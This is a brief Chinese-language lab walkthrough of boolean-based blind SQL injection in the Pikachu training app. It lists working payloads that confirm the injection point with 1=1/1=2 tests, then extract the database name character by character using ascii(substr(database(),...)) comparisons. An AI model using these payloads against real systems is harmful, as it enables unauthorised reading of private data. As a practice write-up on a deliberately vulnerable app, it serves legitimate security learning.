pikachu sql inject bool盲注

输入框中输入 已知用户名 kobe

显示了用户信息

your uid:3
your email is: kobe@pikachu

输入kobe'看一下情况

显示

您输入的username不存在，请重新输入！

这还不能确定是否存在注入点，换一种方式

kobe' and 1=1 #

可以显示出kobe的数据，改为

kobe' and 1=2 #

显示

您输入的username不存在，请重新输入！

说明存在布尔盲注注入点

kobe' and ascii(substr(database(),1,1))>= 113 #
显示
您输入的username不存在，请重新输入！

kobe' and ascii(substr(database(),1,1))>= 112 #
显示
your uid:3
your email is: kobe@pikachu.com

ascii码112 就是p，通过这种方式可以将数据库名称字符一个个爆出